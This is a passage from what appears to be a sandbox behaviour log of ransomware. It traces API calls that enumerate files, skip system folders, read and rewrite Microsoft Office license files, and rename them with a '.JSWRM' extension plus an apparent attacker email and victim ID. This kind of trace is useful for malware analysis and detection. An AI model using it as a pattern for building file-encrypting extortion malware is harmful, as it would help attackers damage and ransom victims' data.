lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe91393b5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe91393b5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe91d1cf5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProMSDNR_Retail-ul-oob.xrm-ms", cAlternateFileName="PRD97E~1.XRM")) returned 1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.817] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0107.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.817] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0107.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0107.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProMSDNR_Retail-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0107.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0107.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0107.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.818] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11612) returned 1 [0107.818] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d50) returned 0x24c1d0 [0107.818] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d50, lpOverlapped=0x0) returned 1 [0107.821] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.821] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d50, lpOverlapped=0x0) returned 1 [0107.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.821] CloseHandle (hObject=0x45c) returned 1 [0107.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0107.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0107.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0107.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0107.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0107.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0107.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.821] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0107.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0107.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0107.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.822] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe90c6c9f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe90c6c9f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9185850, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4df5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProMSDNR_Retail-ul-phn.xrm-ms", cAlternateFileName="PRA333~1.XRM")) returned 1 [0107.822] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.822] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.822] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.822] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.822] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.822] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.823] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.823] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.823] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.823] lstrcmpiW (lpString1="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0107.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0107.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0107.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProMSDNR_Retail-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProMSDNR_Retail-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0107.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0107.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.824] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19957) returned 1 [0107.824] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0107.824] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0107.827] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.827] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0107.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.827] CloseHandle (hObject=0x45c) returned 1 [0107.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0107.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0107.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0107.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0107.827] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0107.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0107.827] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.827] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProMSDNR_Retail-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectpromsdnr_retail-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0107.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0107.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0107.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.828] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9054589, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9054589, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe91393b5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bc3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_Subscription-pl.xrm-ms", cAlternateFileName="PR3538~1.XRM")) returned 1 [0107.828] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2=".") returned 1 [0107.828] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="..") returned 1 [0107.828] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="...") returned 1 [0107.829] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="windows") returned -1 [0107.829] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="recovery") returned -1 [0107.829] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.829] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.829] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.829] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.829] lstrcmpiW (lpString1="ProjectProO365R_Subscription-pl.xrm-ms", lpString2="msocache") returned 1 [0107.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0107.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0107.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0107.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0107.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-pl.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_Subscription-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0107.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0107.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0107.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0107.829] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.830] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11203) returned 1 [0107.830] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bc0) returned 0x24c1d0 [0107.830] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bc0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bc0, lpOverlapped=0x0) returned 1 [0107.832] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.832] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bc0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bc0, lpOverlapped=0x0) returned 1 [0107.832] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.832] CloseHandle (hObject=0x45c) returned 1 [0107.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0107.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0107.833] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0107.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0107.833] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0107.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0107.833] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: 